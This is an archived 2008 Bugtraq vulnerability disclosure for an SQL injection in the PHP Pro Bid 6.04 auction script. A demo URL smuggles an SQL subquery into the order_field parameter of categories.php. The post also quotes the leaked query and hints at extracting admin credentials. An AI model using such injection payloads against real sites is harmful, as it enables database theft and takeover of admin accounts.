lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 19 Sep 2008 11:14:40 +0200
From: "Jan van Niekerk" <jvnkrk@...il.com>
To: bugtraq@...urityfocus.com
Subject: PHP pro bid v 6.04 SQL injection

Affected software: PHP pro bid v 6.04 (as at 2008-09-11)

Vendor description: The Leading Proffessional (sic) Auction Script
Software available online today written in PHP/ Mysql

Impact: SQL injection

Description:

categories.php and other pages of php pro bid accept user-supplied
order-by and ASC/DESC fields.

The software prints helpful messages too:

SQL Query: SELECT a.auction_id, a.name, a.start_price, a.max_bid,
a.nb_bids, a.currency, a.end_time, a.closed, a.bold, a.hl,
a.buyout_price, a.is_offer, a.reserve_price, a.owner_id FROM
probid_auctions a WHERE a.active=1 AND a.approved=1 AND a.closed=0 AND
a.deleted=0 AND a.list_in!='store' AND a.creation_in_progress=0 GROUP
BY a.auction_id ORDER BY (select 1)x LIMIT 0, 20

Leveraging an admin user name and password is left as an exercise to the reader.

Demo:
http://example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20

Solution:
 - Don't let junior programmers add sort-by column features. The original
design was much nicer than the later hacks.
 - If you fix a bug (for example, in search.php), take the trouble to
look for equivalent bugs in other pages.  Did I mention that the bug
is on another page too?  Not?  Oh well.

Timeline:
 - Posted this as a comment on the vendor contact-us web form last week.
 - Sent this to bugtraq this week (yesterday)
 - Bugtraq said post not exploits against live sites
 - URL of vendor demo site duly censored, in the interests of full disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ